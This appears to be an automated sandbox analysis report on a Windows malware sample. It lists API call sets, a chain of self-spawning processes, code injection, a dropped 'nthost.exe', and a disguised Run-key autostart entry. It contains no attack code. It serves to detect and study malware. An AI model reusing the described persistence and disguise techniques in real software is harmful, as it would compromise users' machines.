Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: _strlen,ShellExecuteA,ShellAboutW,ExtractIconA,GetColorSpace,GetLogColorSpaceA,ChoosePixelFormat,SetICMMode,GetPrivateProfileSectionNamesA,GetCalendarInfoW,GetLocaleInfoW,GetModuleHandleW,LocalAlloc,VirtualProtect,GetTickCount,2_2_0300966F
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,4_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,4_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,4_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,4_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,4_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,4_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,4_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,6_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,6_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,6_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,6_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,6_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,8_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,8_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,8_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,8_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,8_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,8_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,8_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,10_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,10_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,10_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,10_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,10_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,12_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,12_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,12_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,12_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,12_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,14_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,14_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,14_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,14_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,14_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,16_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,16_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,16_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,16_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,16_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,18_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,18_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,18_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,18_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,18_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,18_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,18_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,20_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,20_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,20_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,20_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,20_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,20_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,20_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,22_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,22_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,22_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,22_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,22_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,22_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,22_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,24_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,24_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,24_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,24_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,24_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,26_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,26_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,26_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,26_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,26_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,26_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,26_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,28_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,28_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,28_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,28_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,28_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,28_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,28_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,30_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,30_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,30_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,30_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,30_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,30_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,30_2_00409DFC

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 33765 Sample:  obtG43AWHP.bin Startdate:  08/10/2017 Architecture:  WINDOWS Score:  80 1 obtG43AWHP.exe main->1      started     38 explorer.exe main->38      started     3481sig Contains functionality to inject code into remote processes 5501sig Creates autostart registry keys with suspicious names 1541sig Injects a PE file into a foreign processes 3482sig Contains functionality to inject code into remote processes 5502sig Creates autostart registry keys with suspicious names 1542sig Injects a PE file into a foreign processes 3483sig Contains functionality to inject code into remote processes 5503sig Creates autostart registry keys with suspicious names 1543sig Injects a PE file into a foreign processes 3484sig Contains functionality to inject code into remote processes 5504sig Creates autostart registry keys with suspicious names 1544sig Injects a PE file into a foreign processes 3485sig Contains functionality to inject code into remote processes 5505sig Creates autostart registry keys with suspicious names 1545sig Injects a PE file into a foreign processes 3486sig Contains functionality to inject code into remote processes 5506sig Creates autostart registry keys with suspicious names 1546sig Injects a PE file into a foreign processes 3487sig Contains functionality to inject code into remote processes 5507sig Creates autostart registry keys with suspicious names 1547sig Injects a PE file into a foreign processes 3488sig Contains functionality to inject code into remote processes 5508sig Creates autostart registry keys with suspicious names 1548sig Injects a PE file into a foreign processes 3489sig Contains functionality to inject code into remote processes 5509sig Creates autostart registry keys with suspicious names 1549sig Injects a PE file into a foreign processes 34810sig Contains functionality to inject code into remote processes 55010sig Creates autostart registry keys with suspicious names 15410sig Injects a PE file into a foreign processes 34811sig Contains functionality to inject code into remote processes 55011sig Creates autostart registry keys with suspicious names 15411sig Injects a PE file into a foreign processes 34812sig Contains functionality to inject code into remote processes 55012sig Creates autostart registry keys with suspicious names 15412sig Injects a PE file into a foreign processes 34813sig Contains functionality to inject code into remote processes 55013sig Creates autostart registry keys with suspicious names 15413sig Injects a PE file into a foreign processes 34814sig Contains functionality to inject code into remote processes 55014sig Creates autostart registry keys with suspicious names 15414sig Injects a PE file into a foreign processes 34815sig Contains functionality to inject code into remote processes 55015sig Creates autostart registry keys with suspicious names 15415sig Injects a PE file into a foreign processes 34816sig Contains functionality to inject code into remote processes 55016sig Creates autostart registry keys with suspicious names 15416sig Injects a PE file into a foreign processes 34817sig Contains functionality to inject code into remote processes 55017sig Creates autostart registry keys with suspicious names 15417sig Injects a PE file into a foreign processes 34818sig Contains functionality to inject code into remote processes 55018sig Creates autostart registry keys with suspicious names 15418sig Injects a PE file into a foreign processes 34819sig Contains functionality to inject code into remote processes 55019sig Creates autostart registry keys with suspicious names 15419sig Injects a PE file into a foreign processes 34820sig Contains functionality to inject code into remote processes 55020sig Creates autostart registry keys with suspicious names 15420sig Injects a PE file into a foreign processes 34821sig Contains functionality to inject code into remote processes 55021sig Creates autostart registry keys with suspicious names 15421sig Injects a PE file into a foreign processes 34822sig Contains functionality to inject code into remote processes 55022sig Creates autostart registry keys with suspicious names 15422sig Injects a PE file into a foreign processes 34823sig Contains functionality to inject code into remote processes 55023sig Creates autostart registry keys with suspicious names 15423sig Injects a PE file into a foreign processes 34824sig Contains functionality to inject code into remote processes 55024sig Creates autostart registry keys with suspicious names 15424sig Injects a PE file into a foreign processes 34825sig Contains functionality to inject code into remote processes 55025sig Creates autostart registry keys with suspicious names 15425sig Injects a PE file into a foreign processes 34826sig Contains functionality to inject code into remote processes 55026sig Creates autostart registry keys with suspicious names 15426sig Injects a PE file into a foreign processes 34827sig Contains functionality to inject code into remote processes 55027sig Creates autostart registry keys with suspicious names 15427sig Injects a PE file into a foreign processes 34828sig Contains functionality to inject code into remote processes 55028sig Creates autostart registry keys with suspicious names 15428sig Injects a PE file into a foreign processes 34829sig Contains functionality to inject code into remote processes 55029sig Creates autostart registry keys with suspicious names 15429sig Injects a PE file into a foreign processes 34830sig Contains functionality to inject code into remote processes 55030sig Creates autostart registry keys with suspicious names 15430sig Injects a PE file into a foreign processes 34831sig Contains functionality to inject code into remote processes 55031sig Creates autostart registry keys with suspicious names 15431sig Injects a PE file into a foreign processes 34832sig Contains functionality to inject code into remote processes 55032sig Creates autostart registry keys with suspicious names 15432sig Injects a PE file into a foreign processes 34833sig Contains functionality to inject code into remote processes 55033sig Creates autostart registry keys with suspicious names 15433sig Injects a PE file into a foreign processes 34834sig Contains functionality to inject code into remote processes 55034sig Creates autostart registry keys with suspicious names 15434sig Injects a PE file into a foreign processes 34835sig Contains functionality to inject code into remote processes 55035sig Creates autostart registry keys with suspicious names 15435sig Injects a PE file into a foreign processes 34836sig Contains functionality to inject code into remote processes 55036sig Creates autostart registry keys with suspicious names 15436sig Injects a PE file into a foreign processes 15437sig Injects a PE file into a foreign processes 59037sig Antivirus detection for dropped file 15439sig Injects a PE file into a foreign processes 59039sig Antivirus detection for dropped file d1e569798 nthost.exe, PE32 1->3481sig 1->5501sig 1->1541sig 2 obtG43AWHP.exe 1 1->2      started     2->3482sig 2->5502sig 2->1542sig 3 obtG43AWHP.exe 2->3      started     3->3483sig 3->5503sig 3->1543sig 4 obtG43AWHP.exe 1 3->4      started     4->3484sig 4->5504sig 4->1544sig 5 obtG43AWHP.exe 4->5      started     5->3485sig 5->5505sig 5->1545sig 6 obtG43AWHP.exe 1 5->6      started     6->3486sig 6->5506sig 6->1546sig 7 obtG43AWHP.exe 6->7      started     7->3487sig 7->5507sig 7->1547sig 8 obtG43AWHP.exe 1 7->8      started     8->3488sig 8->5508sig 8->1548sig 9 obtG43AWHP.exe 8->9      started     9->3489sig 9->5509sig 9->1549sig 10 obtG43AWHP.exe 1 9->10      started     10->34810sig 10->55010sig 10->15410sig 11 obtG43AWHP.exe 10->11      started     11->34811sig 11->55011sig 11->15411sig 12 obtG43AWHP.exe 1 11->12      started     12->34812sig 12->55012sig 12->15412sig 13 obtG43AWHP.exe 12->13      started     13->34813sig 13->55013sig 13->15413sig 14 obtG43AWHP.exe 1 13->14      started     14->34814sig 14->55014sig 14->15414sig 15 obtG43AWHP.exe 14->15      started     15->34815sig 15->55015sig 15->15415sig 16 obtG43AWHP.exe 1 15->16      started     16->34816sig 16->55016sig 16->15416sig 17 obtG43AWHP.exe 16->17      started     17->34817sig 17->55017sig 17->15417sig 18 obtG43AWHP.exe 1 17->18      started     18->34818sig 18->55018sig 18->15418sig 19 obtG43AWHP.exe 18->19      started     19->34819sig 19->55019sig 19->15419sig 20 obtG43AWHP.exe 1 19->20      started     20->34820sig 20->55020sig 20->15420sig 21 obtG43AWHP.exe 20->21      started     21->34821sig 21->55021sig 21->15421sig 22 obtG43AWHP.exe 1 21->22      started     22->34822sig 22->55022sig 22->15422sig 23 obtG43AWHP.exe 22->23      started     23->34823sig 23->55023sig 23->15423sig 24 obtG43AWHP.exe 1 23->24      started     24->34824sig 24->55024sig 24->15424sig 25 obtG43AWHP.exe 24->25      started     25->34825sig 25->55025sig 25->15425sig 26 obtG43AWHP.exe 25->26      started     26->34826sig 26->55026sig 26->15426sig 27 obtG43AWHP.exe 26->27      started     27->34827sig 27->55027sig 27->15427sig 28 obtG43AWHP.exe 27->28      started     28->34828sig 28->55028sig 28->15428sig 29 obtG43AWHP.exe 28->29      started     29->34829sig 29->55029sig 29->15429sig 30 obtG43AWHP.exe 29->30      started     30->34830sig 30->55030sig 30->15430sig 31 obtG43AWHP.exe 30->31      started     31->34831sig 31->55031sig 31->15431sig 32 obtG43AWHP.exe 31->32      started     32->34832sig 32->55032sig 32->15432sig 33 obtG43AWHP.exe 32->33      started     33->34833sig 33->55033sig 33->15433sig 34 obtG43AWHP.exe 33->34      started     34->34834sig 34->55034sig 34->15434sig 35 obtG43AWHP.exe 34->35      started     35->34835sig 35->55035sig 35->15435sig 36 obtG43AWHP.exe 35->36      started     36->34836sig 36->55036sig 36->15436sig 36->d1e569798 dropped 37 nthost.exe 36->37      started     37->15437sig 37->59037sig 39 nthost.exe 37->39      started     39->15439sig 39->59039sig process1 signatures1 process2 signatures2 process3 signatures3 process4 signatures4 process5 signatures5 process6 signatures6 process7 signatures7 process8 signatures8 process9 signatures9 process10 signatures10 process11 signatures11 process12 signatures12 process13 signatures13 process14 signatures14 process15 signatures15 process16 signatures16 process17 signatures17 process18 signatures18 process19 signatures19 process20 signatures20 process21 signatures21 process22 signatures22 process23 signatures23 process24 signatures24 process25 signatures25 process26 signatures26 process27 signatures27 process28 signatures28 process29 signatures29 process30 signatures30 process31 signatures31 process32 signatures32 process33 signatures33 process34 signatures34 process35 signatures35 process36 fileCreated36 signatures36 process37 signatures37 process39 signatures39 fileCreated2 fileCreated4 fileCreated6 fileCreated8 fileCreated10 fileCreated12 fileCreated14 fileCreated16 fileCreated18 fileCreated20 fileCreated22 fileCreated24

Simulations

Behavior and APIs

TimeTypeDescription
19:11:14API Interceptor1x Sleep call for process: explorer.exe modified from: 60000ms to: 500ms
19:11:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DX9 C++RTL C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe

Antivirus Detection

Initial Sample

SourceDetectionCloudLink
obtG43AWH.exe46%virustotalBrowse

Dropped Files

SourceDetectionCloudLink
C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe46%virustotalBrowse

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot

windows-stand

Startup

  • System is w7
  • obtG43AWHP.exe (PID: 3072 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
    • obtG43AWHP.exe (PID: 3120 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
      • obtG43AWHP.exe (PID: 3132 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 0 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
        • obtG43AWHP.exe (PID: 3156 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 0 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
          • obtG43AWHP.exe (PID: 3168 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 1 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
            • obtG43AWHP.exe (PID: 3192 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 1 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
              • obtG43AWHP.exe (PID: 3204 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 2 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                • obtG43AWHP.exe (PID: 3220 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 2 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                  • obtG43AWHP.exe (PID: 3232 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 3 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                    • obtG43AWHP.exe (PID: 3248 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 3 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                      • obtG43AWHP.exe (PID: 3260 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 4 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                        • obtG43AWHP.exe (PID: 3284 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 4 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                          • obtG43AWHP.exe (PID: 3296 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 5 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                            • obtG43AWHP.exe (PID: 3312 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 5 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                              • obtG43AWHP.exe (PID: 3324 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 6 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                • obtG43AWHP.exe (PID: 3340 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 6 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                  • obtG43AWHP.exe (PID: 3352 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 7 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                    • obtG43AWHP.exe (PID: 3368 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 7 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                      • obtG43AWHP.exe (PID: 3380 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 8 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
